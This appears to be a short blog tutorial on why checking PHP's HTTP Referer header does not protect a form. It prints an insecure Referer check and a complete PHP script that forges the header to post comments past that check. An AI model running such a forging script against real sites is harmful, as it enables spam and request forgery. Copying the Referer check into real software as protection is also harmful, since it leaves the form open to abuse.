How to bypass the REFERER security check

0

The http-Referer header is nothing more than the web address of the page that referred a browser to the actual page.
If you are trying to "protect" a file by making sure that the http-referer value (or any other browser passed variable) is your own website, you can be bypassed by this simple technique. You cannot trust any browser passed variables.

Suppose you have a form that requests the user to enter his user name and a comment. The form sends the user inputs to, let say formprocess.php. In the formprocess.php you check if the http-referer is your site to prevent from spam comments:

<?php
if ( eregi ( "www.mysite.com", $_SERVER['HTTP_REFERER'] ) )
{
// do something
}
else
{
echo "Nice try";
}
?>

The problem here is that you deal with a browser passed variable. An attacker can easily bypass your check by giving your site as referer.

Look at this script:


<?php
// the site we want to attack
$host = "www.mysite.com";
// the file we want to attack
$file = "formprocess.php";

// construct a header for our request

$hdrs = array( 'http' => array(

'method' => "POST",

'header'=> "accept-language: en\r\n" .

"Host: $host\r\n" .

"Referer: http://$host\r\n" . // Setting the http-referer

"Content-Type: application/x-www-form-urlencoded\r\n" .
"Content-Length: 33\r\n\r\n" .

"username=mustap&comment=NOCOMMENT\r\n"

)

);

// get the requested page from the server

// with our header as a request-header

$context = stream_context_create($hdrs);

$fp = fopen("http://" . $host . "/" . $file, 'r', false, $context);

fpassthru($fp);

fclose($fp);

?>

Create a formprocess.php file and try to get it with this script, you will see that the if statment in formprocess.php is useless.
Labels:
Loading related posts...
Reactions: 

0 comments:

Post a Comment

2010 WEBSITE20. All rights reserved.